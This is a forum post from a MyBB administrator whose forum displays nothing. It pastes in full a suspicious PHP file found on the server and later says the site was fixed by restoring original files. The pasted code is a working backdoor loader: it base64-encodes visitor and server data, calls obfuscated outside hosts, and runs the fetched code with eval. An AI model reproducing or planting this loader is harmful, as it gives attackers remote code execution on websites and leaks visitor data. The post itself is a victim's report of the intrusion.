Hello..
I have a small (quite BIG) problem with my present mybb.
the problem is, NOTHING IS VISIBLE.. excatly.
Nothing shows up but admin cp is accessible..
PLease help me...
No errors or anything is displayed. !
I tried everything i could.. and also, cleared my browser cache, etc., etc.,
But it is warez linking forum.. so, i thought.. not to post...
Even diagnostics.php fails !!!
AM I HACKED !!!??
I additionally found a file named 23067.php in which the following were present.. and i DO NOT REMEMBER HAVING THIS FILE ON SERVER ::
<?
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).
".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cnNzbmV3cy53cw==");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="9ec26f2d026b72d47e5abd17bf9553f6")
$f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);
};
die();
?>
EDIT : SOLVED IT MYSELF !!!!
this is where the hacker went :
I just replaced original files from latest mybb source and also, just took out any extra and strangely named files, and some .htaccess files which were not ought to be present in some places..
I enjoyed restoring it !!!!